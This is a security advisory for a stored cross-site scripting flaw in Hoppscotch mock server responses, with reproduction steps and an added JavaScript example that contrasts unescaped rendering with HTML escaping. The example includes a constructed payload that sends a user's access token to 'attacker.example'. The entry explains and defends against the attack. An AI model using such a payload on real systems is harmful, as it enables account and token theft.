hoppscotch
cpe:2.3:a:hoppscotch:hoppscotch:*:*:*:*:*:*:*
- <= 2026.2.1
A stored cross-site scripting vulnerability has been identified in Hoppscotch versions prior to 2026.3.0. Mock server responses are not sufficiently sanitized, so a malicious script injected into a response body is stored and later executed in the context of the user who views it. Because the script runs in the user's origin, it can issue requests and read data on that user's behalf, potentially leading to cross-site request forgery.
To reproduce, create a new collection in Hoppscotch with example requests added, then create a mock server from it. Intercept the resulting request with a proxy such as Burp Suite and modify the request body to include a script that exfiltrates the user's personal access token (PAT) to an external server. After the modified request is forwarded, the PAT is sent to the attacker-controlled domain, demonstrating successful exploitation.
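As an added illustration that is not Hoppscotch's own code, the following JavaScript shows the rendering mistake the advisory describes (a stored mock response body reaching the HTML parser unescaped) beside the escaping that prevents it, with a small check a reviewer can run over rendered output. The payload, the attacker host "attacker.example", the storage key "pat", the route and the function names are constructed assumptions for the example; the advisory does not disclose the actual injection point or payload.

```javascript
// Added example (not Hoppscotch code). Shows why a stored mock server response
// body must be treated as untrusted text when it is shown in the UI.

// Constructed payload of the kind the advisory describes: an event handler
// that reads a personal access token and sends it to an attacker host.
// The host "attacker.example" and the storage key "pat" are assumptions.
const CONSTRUCTED_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?t=\' + localStorage.getItem(\'pat\'))">';

// Minimal stand-in for a mock server's storage: example responses are saved
// as-is, so whatever an attacker writes through the save request is what
// every later viewer of the mock server receives.
const mockResponses = new Map();
function saveExampleResponse(route, body) {
  mockResponses.set(route, String(body));
}
function serveMockResponse(route) {
  return mockResponses.get(route);
}

// Vulnerable pattern: the body is interpolated straight into markup, which is
// what assigning it to element.innerHTML does. Tags and on*= handlers in it
// reach the browser's HTML parser and run in the viewer's origin.
function renderBodyUnsafe(body) {
  return `<pre class="mock-body">${body}</pre>`;
}

// Hardened pattern: escape the five characters that have meaning to the HTML
// parser, so the body is displayed verbatim. Equivalent to element.textContent.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}
function renderBodySafe(body) {
  return `<pre class="mock-body">${escapeHtml(body)}</pre>`;
}

// Review check: inside the <pre>, any element or handler needs a literal '<'
// to be parsed as a tag, so correctly escaped output must contain none.
function innerMarkup(html) {
  return html.slice('<pre class="mock-body">'.length, -'</pre>'.length);
}
function containsActiveMarkup(html) {
  return innerMarkup(html).includes('<');
}

// Walk the flow end to end for one route: store the body the way the mock
// server would, serve it back, and report whether each renderer lets
// executable markup through.
function demonstrate(route, body) {
  saveExampleResponse(route, body);
  const stored = serveMockResponse(route);
  return {
    unsafeExecutes: containsActiveMarkup(renderBodyUnsafe(stored)),
    safeExecutes: containsActiveMarkup(renderBodySafe(stored)),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demonstrate('/api/user', CONSTRUCTED_PAYLOAD));
  // → { unsafeExecutes: true, safeExecutes: false }
}
```

The check is deliberately narrow: it only proves that nothing in the escaped body can open a tag. It is not a sanitizer, and the right fix is to never hand a stored response body to an HTML sink at all; a Content-Security-Policy without `unsafe-inline` and a token kept out of script-readable storage would each reduce the impact even when such a sink is missed.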
Users should update to Hoppscotch version 2026.3.0 or later, where this vulnerability has been patched.